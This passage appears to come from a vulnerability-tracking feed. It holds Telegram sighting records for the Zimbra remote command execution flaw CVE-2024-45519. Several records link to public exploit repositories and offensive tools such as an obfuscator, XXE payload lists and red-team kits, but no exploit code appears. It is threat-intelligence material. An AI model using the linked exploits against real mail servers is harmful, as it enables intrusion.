Collaboration.\nEnterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. The attacks seek to exploit CVE-2024-45519, a severe security flaw in Zimbra's postjournal service that could enable unauthenticated attackers to", "creation_timestamp": "2024-10-02T13:28:40.000000Z"}, {"uuid": "1f93d50d-2e61-4b2e-b4bd-93b98c8d58b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8864", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:21.000000Z"}, {"uuid": "56ac5916-1a1e-4506-b444-b531268bb273", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/24042", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:33.000000Z"}, {"uuid": "d34a10d4-104b-41ae-98dd-4a2663178ad6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/InfoSecInsider/23977", "content": "\u26a1\ufe0fZimbra - Remote Command Execution (CVE-2024-45519).\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:08.000000Z"}, {"uuid": "7598bcc1-5af5-4de4-9335-19feb9130f7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/InfoSecInsider/23976", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:07.000000Z"}, {"uuid": "71431c22-8ea8-4169-a8af-961c7b222726", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3783", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:15.000000Z"}, {"uuid": "9a8f3a19-91a8-41d2-8366-4f677ac2c10c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7500", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:21.000000Z"}, {"uuid": "1e6baebe-8452-448c-89a6-d49e4d90651e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3798", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:24.000000Z"}, {"uuid": "3050adeb-12ff-4c6e-9e83-3fe54857daeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/softrinx/528", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-30T00:37:28.000000Z"}, {"uuid": "5468fe6a-2af3-41d6-b303-401f4140e8f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/proxy_bar/2279", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-29T11:36:37.000000Z"}, {"uuid": "08144ebe-ee15-4884-a9e4-3c7159ac66e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2294", "content": "\u041c\u044b \u0443\u0436\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u043f\u043e \u043f\u043e\u0432\u043e\u0434\u0443 CVE-2024-45519 - Zimbra\n*\n\u041d\u043e, \u0432\u043e\u0442 \u043e\u0442\u043b\u0438\u0447\u043d\u044b\u0439 Postjournal Exploit + \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e \u043a\u0430\u043a \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u0441\u0442\u0435\u043d\u0434 \u0447\u0442\u043e \u0431\u044b \u043f\u043e\u0438\u0433\u0440\u0430\u0442\u044c\u0441\u044f \u0441\u043e \u0441\u043f\u043b\u043e\u0438\u0442\u043e\u043c \u0438 \u0434\u0430\u043b\u0435\u0435 \u043f\u043e\u0432\u044b\u0448\u0430\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 (\u043b\u0438\u0431\u043e \u0432 \u0431\u043e\u043a \u0443\u0445\u043e\u0434\u0438\u0442\u044c)\n*\nzimbra.labo", "creation_timestamp": "2024-10-05T08:14:30.000000Z"}, {"uuid": "9f5ab129-dff9-4459-b305-04f09859b58d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/true_secator/6248", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0442\u0440\u0435\u043d\u0434\u044b \u043f\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c.\n\n1. \u0412\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-45519 \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043f\u043e\u0447\u0442\u044b postjournal \u043f\u043e\u0447\u0442\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 Zimbra Collaboration, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b SMTP.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0441\u0432\u0435\u0442\u0438\u043b\u0438 \u041f\u043e\u0437\u0438\u0442\u0438\u0432\u044b, \u043f\u043e\u043a\u0430\u0437\u0430\u0432 \u0432\u0438\u0434\u0435\u043e \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2024-45519, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043a\u043e\u0440\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0421yberok \u043d\u0430 \u0441\u0432\u043e\u0438\u0445 \u0440\u0430\u0434\u0430\u0440\u0430\u0445 \u0421\u041a\u0418\u041f\u0410 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u044e\u0442 \u0431\u043e\u043b\u0435\u0435 10\u043a \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0430\u043b\u043b\u044f\u0446\u0438\u0439 Zimbra Collaboration \u0432 \u0420\u0443\u043d\u0435\u0442\u0435, \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0431\u043e\u043b\u0435\u0435 3\u043a \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 IP \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u044e\u0442 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043f\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0443 SMTP \u0438 \u043d\u0435 \u0438\u043c\u0435\u044e\u0442 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439, \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0430\u044f\u0441\u044c \u0440\u0438\u0441\u043a\u0443 \u0430\u0442\u0430\u043a \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c CVE-2024-45519.\n\n\u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u043a\u0440\u0430\u0439\u043d\u0435 \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0435 \u0448\u043b\u044e\u0437\u044b Zimbra Collaboration.\n\n2. \u0410\u0432\u0441\u0442\u0440\u0438\u0439\u0441\u043a\u0430\u044f CyberDanube \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0434\u043e \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0418\u0411\u041f-\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 Riello UPS.\n\n\u041a\u0430\u043a \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u043d\u0435 \u0441\u043c\u043e\u0433 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u043a\u0430\u0440\u0442\u0435 \u0441\u0432\u044f\u0437\u0438 NetMan 204 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 \u0441\u0438\u0441\u0442\u0435\u043c \u0418\u0411\u041f Riello \u0432 \u0441\u0440\u0435\u0434\u043d\u0438\u0435 \u0438 \u043a\u0440\u0443\u043f\u043d\u044b\u0435 \u0441\u0435\u0442\u0438.\n\n\u041e\u0434\u043d\u0430 \u043d\u0438\u0445 CVE-2024-8877 - \u044d\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c SQL-\u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0434\u043b\u044f \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0436\u0443\u0440\u043d\u0430\u043b\u0430.\n\n\u0412\u0442\u043e\u0440\u0430\u044f CVE-2024-8878 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0434\u043b\u044f \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0430\u0440\u043e\u043b\u044f.\n\nCyberDanube \u0443\u0432\u0435\u0434\u043e\u043c\u0438\u043b\u0430 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 \u0438\u044e\u043d\u0435, \u043e\u0434\u043d\u0430\u043a\u043e Riello \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0430, \u0447\u0442\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0437\u0430\u0439\u043c\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0435 \u0432\u0440\u0435\u043c\u0435\u043d\u0438, \u0447\u0435\u043c \u043e\u0436\u0438\u0434\u0430\u043b\u043e\u0441\u044c.\n\n3. \u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b Bitsight \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u043e\u0446\u0435\u043d\u043a\u0438 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u0440\u043e\u0432\u043d\u0435\u043c\u0435\u0440\u0430\u0445 ATG \u0432 \u0431\u0430\u043a\u0430\u0445, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432 10 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0443 \u043f\u044f\u0442\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432 Alisonic, Dover Corp, Franklin Fueling Systems, Maglink \u0438 Omntec, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0432 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u0445 \u0441\u0435\u043a\u0442\u043e\u0440\u0430\u0445.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u0438\u0437\u0443\u0447\u0438\u043b\u0438 \u0448\u0435\u0441\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c ATG \u043e\u0442 \u043f\u044f\u0442\u0438 \u0440\u0430\u0437\u043d\u044b\u0445 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432 \u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 10 \u0434\u044b\u0440 (\u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0440\u044f\u0434 0-day), \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0438\u0445 Maglink LX \u0438 LX4, OPW SiteSentinel, Proteus OEL8000, Alisonic Sibylla \u0438 Franklin TS-550.\n\n\u0421\u0435\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d\u044b \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0443\u0440\u043e\u0432\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438. \u041e\u043d\u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 \u043e\u0431\u0445\u043e\u0434\u043e\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0436\u0435\u0441\u0442\u043a\u043e \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u0443\u0447\u0435\u0442\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438, \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u043c\u0430\u043d\u0434 \u041e\u0421 \u0438 SQL. \u041e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 - \u044d\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 XSS \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438, EoP \u0438 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0435 \u0447\u0442\u0435\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432.\u00a0\n\n\u0412\u0441\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0435 \u043f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u0430 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0437 \u043d\u0438\u0445 - \u043f\u043e\u043b\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u0412 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u043c \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438 \u0445\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0447\u0442\u043e\u0431\u044b \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 DoS \u0438 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430. Bitsight \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0433\u0443\u0442 \u043d\u0430\u043d\u0435\u0441\u0442\u0438 \u0444\u0438\u0437\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0449\u0435\u0440\u0431.\u00a0\n\n\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 Bitsight \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0442\u044b\u0441\u044f\u0447\u0438 \u043d\u0435\u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u0445 \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 ATG, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0432 \u0421\u0428\u0410 \u0438 \u0415\u0432\u0440\u043e\u043f\u0435, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0430\u044d\u0440\u043e\u043f\u043e\u0440\u0442\u0430\u0445, \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u0445, \u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f\u0445 \u0438 \u0432 \u043a\u043e\u043c\u043c\u0443\u043d\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u043b\u0443\u0436\u0431\u0430\u0445.\u00a0\n\n4. \u041a\u0430\u043a \u0438 \u043e\u0436\u0438\u0434\u0430\u043b\u043e\u0441\u044c, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043b\u0438 \u043a \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0447\u0442\u043e\u0431\u044b 